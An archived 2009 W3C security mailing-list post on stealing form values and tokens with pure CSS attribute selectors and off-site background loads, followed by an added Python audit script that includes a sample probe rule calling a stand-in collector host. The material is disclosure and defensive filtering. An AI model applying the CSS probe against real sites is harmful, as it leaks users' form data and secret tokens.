Re: Seamless iframes + CSS3 selectors = bad idea

From: gaz Heyes <gazheyes@gmail.com>
Date: Tue, 8 Dec 2009 01:48:41 +0000
Message-ID: <252dd75b0912071748u34170413qde6b1b0ddf50277a@mail.gmail.com>
To: Daniel Glazman <daniel@glazman.org>
Cc: public-web-security@w3.org

2009/12/7 Daniel Glazman <daniel@glazman.org>

> sird@rckc.at wrote:
>
>> a[href$=.pdf]::before{content:url(pdficon.gif)}
>>
>> And it rocks, it really rocks.. but do we really want to give soooo much
>> power to CSS?
>
> "we"? Who's that "we"? In the World Wide Web Consortium, that "we"
> is the Community on one hand, the W3C Membership (including browser
> vendors) on the other.
> So yes, "we" wanted to add that ability to CSS
>

The scenario is a web site allows a user to place an external stylesheet with
background rules and selectors. This could be encoded using BOM characters
or @charset 'UTF-7'; Wonderful Safari allows me to specify multiple
backgrounds for the same element, allowing me to send more than one scan of
data.

Try this with Safari 4.04:-
<http://www.businessinfo.co.uk/labs/test_files/css_fun/page_allows_css.php>

I can brute force a common field "first name", I can check what a token
starts and ends with and I can scan for which characters it contains. All
with pure CSS (no HTML). "We" (Me, Sirdarckcat and David) are not saying
this is a serious vulnerability now but it has potential to be in future.
Especially when browsers support more selectors and allow multiple
backgrounds.

Received on Tuesday, 8 December 2009 01:49:23 GMT
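The pattern described in the message (an attribute-substring selector whose declaration block loads an off-site url(), possibly with several backgrounds per element, and encoding tricks such as a BOM or `@charset 'UTF-7'`) is something a site that accepts user stylesheets can screen for before serving them. The following is an added example, not code from the thread or its participants: a regex-based audit with constructed input, using `collector.example` as a placeholder host. A real filter should run on a proper CSS parser and re-encode user CSS as UTF-8 server-side; this only illustrates the checks.

```python
import re
from urllib.parse import urlparse

# Deliberately simple regexes; they cover the thread's examples, not every CSS escape.
ATTR_SELECTOR = re.compile(r'\[\s*([\w-]+)\s*([\^\$\*|~]?=)\s*("[^"]*"|\'[^\']*\'|[^\]\s]*)\s*\]')
URL_CALL = re.compile(r'url\(\s*(?:"([^"]*)"|\'([^\']*)\'|([^)]*))\s*\)', re.I)
CHARSET = re.compile(r'@charset\s+["\']([^"\']+)["\']', re.I)
RULE = re.compile(r'([^{}]+)\{([^{}]*)\}')  # flat "selector { declarations }" pairs


def url_targets(body):
    """Return every url() target in a declaration block, quoted or bare."""
    return [next(g for g in m.groups() if g is not None).strip()
            for m in URL_CALL.finditer(body)]


def audit_user_css(css, allowed_hosts=()):
    """Flag rules that pair an attribute selector with off-site url() loads,
    plus encoding tricks that could smuggle such a rule past a naive filter."""
    findings = []
    if css.startswith('\ufeff') or css.startswith('+/v8'):  # UTF-8 / UTF-7 BOM
        findings.append('bom')
    m = CHARSET.search(css)
    if m and m.group(1).lower() != 'utf-8':
        findings.append('charset:' + m.group(1))
    for selector, body in RULE.findall(css):
        attr = ATTR_SELECTOR.search(selector.strip())
        offsite = [u for u in url_targets(body)
                   if urlparse(u).netloc and urlparse(u).netloc.lower() not in allowed_hosts]
        if attr and offsite:
            # Count of off-site loads matters: multiple backgrounds = several probes per match.
            findings.append(f'attr-probe:{attr.group(1)}{attr.group(2)}:{len(offsite)}')
    return findings


# Constructed samples. PAGE_RULE is the benign icon rule quoted in the thread (relative URL).
PAGE_RULE = 'a[href$=.pdf]::before{content:url(pdficon.gif)}'
PROBE = 'input[value^="a"]{background:url(//collector.example/a), url(//collector.example/b)}'

if __name__ == '__main__':
    print(audit_user_css(PAGE_RULE))                     # []
    print(audit_user_css(PROBE))                         # ['attr-probe:value^=:2']
    print(audit_user_css("@charset 'UTF-7';\n" + PROBE))  # ['charset:UTF-7', 'attr-probe:value^=:2']
```

Syntax alone does not separate the pdf-icon rule from a probe (both are attribute selectors with url()); the distinguishing signal is where the url() points, which is why the allowlist is the check that matters.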